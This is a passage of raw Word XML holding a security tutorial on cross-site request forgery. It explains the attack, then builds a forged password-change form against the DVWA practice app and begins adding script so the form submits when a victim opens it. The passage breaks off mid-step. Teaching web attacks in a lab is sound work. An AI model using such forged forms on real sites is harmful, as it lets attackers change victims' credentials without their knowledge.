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6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E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3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://null-byte.wonderhowto.com/how-to/manipulate-user-credentials-with-csrf-attack-0186461/" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Manipulate User Credentials with a CSRF Attack </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E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By </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="003D3E6A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>drd</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="003D3E6A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>_</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E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08/31/2018 4:42 am </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Web 2.0 technology has provided a convenient way to post videos online, keep up with old friends on social media, and even bank from the comfort of your web browser. But when applications are poorly designed or incorrectly configured, certain flaws can be exploited. One such flaw, known as CSRF, allows an attacker to use a legitimate user's session to execute unauthorized requests to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E6A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>CSRF Basics</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Cross-site request forgery (CSRF) is a type of attack that abuses the trust a </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="003D3E6A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>web application</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> has for the victim's browser by tricking an authenticated user into submitting unwanted requests on the attacker's behalf. Because CSRF does not transmit any type of response to the attacker, it is said to affect only state-changing requests such as transferring funds, purchasing an item without the knowledge of the victim, or changing user credentials. CSRF (sometimes pronounced sea-surf) is also known as XSRF, session riding, or a one-click attack.</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A CSRF attack is usually accomplished by getting a victim to open a malicious file via some sort of </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="003D3E6A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>social engineering</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="003D3E6A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>phishing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attempt. If the application is vulnerable, once the user opens the file, whatever function the attacker designed to occur will take place. In some instances, this attack can be carried out as "Stored CSRF" in which the malicious commands can be stored in an image tag or hidden form on the webpage. This type of CSRF is considered much more dangerous because the number of potential victims increases in addition to the fact that it is now stored on a legitimate page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E6A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step 1Prepare to Attack</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We will be using </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003D3E6A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>DVWA</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, a vulnerable web application full of common security flaws, to test our attack. Let's fire it up and log in with the default credentials, </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Now go to "DVWA Security" on the left-hand side, and set the security level to </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>low</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> will enable us to carry out our attack successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E6A">
      <w:pPr>
        <w:spacing w:after="0"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noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="1704975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="5" name="Picture 5" descr="https://img.wonderhowto.com/img/61/47/63670621497136/0/manipulate-user-credentials-with-csrf-attack.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1/47/63670621497136/0/manipulate-user-credentials-with-csrf-attack.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Next, click on the "CSRF" tab to access the cross-site request forgery section. We can see that there is a password change functionality on this page:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E6A">
      <w:pPr>
        <w:spacing w:after="0"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noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="1733550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="https://img.wonderhowto.com/img/29/66/63669497318449/0/manipulate-user-credentials-with-csrf-attack.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9/66/63669497318449/0/manipulate-user-credentials-with-csrf-attack.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33550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Right-click anywhere on this page to view the page source. Scroll down and find the HTML form that looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E6A">
      <w:pPr>
        <w:spacing w:after="0"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noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="1009650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="https://img.wonderhowto.com/img/06/43/63670621522621/0/manipulate-user-credentials-with-csrf-attack.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06/43/63670621522621/0/manipulate-user-credentials-with-csrf-attack.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09650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Copy this HTML and </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="003D3E6A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">create a new file in the terminal using </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="003D3E6A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>nano</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. To make this a little more realistic, we need to change the method to POST. Forms like this will rarely use a GET request because, among other things, it displays the parameters right in the URL which is not suitable for sensitive data like passwords.</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D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> csrf.html</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 xml:space="preserve">&lt;form action="#" method="POST"&gt;    New </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>br</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&lt;input type="password" AUTOCOMPLETE="off" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_new</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>br</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Confirm new password: &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>br</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&lt;input type="password" AUTOCOMPLETE="off" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_conf</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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&lt;input type="submit" value="Change" name="Change"&gt;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&lt;/form&gt;</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Press </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ctrl-X</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to save. Now we can open this file in the browser by double-clicking it, and it should look just like the form we saw earlier:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E6A">
      <w:pPr>
        <w:spacing w:after="0"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noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="1838325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2" name="Picture 2" descr="https://img.wonderhowto.com/img/81/69/63670621554089/0/manipulate-user-credentials-with-csrf-attack.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81/69/63670621554089/0/manipulate-user-credentials-with-csrf-attack.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838325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E6A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step 2Modify the Target File</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We need to modify this file a bit for it to be submitted automatically when the victim opens it. First, create the necessary </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>head</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements. We can add some JavaScript within the head to make the form submit automatically by creating a function called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>autoSubmit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. For this to work, we also need to give a name to the form (we will aptly name it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>myForm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</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Next, using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
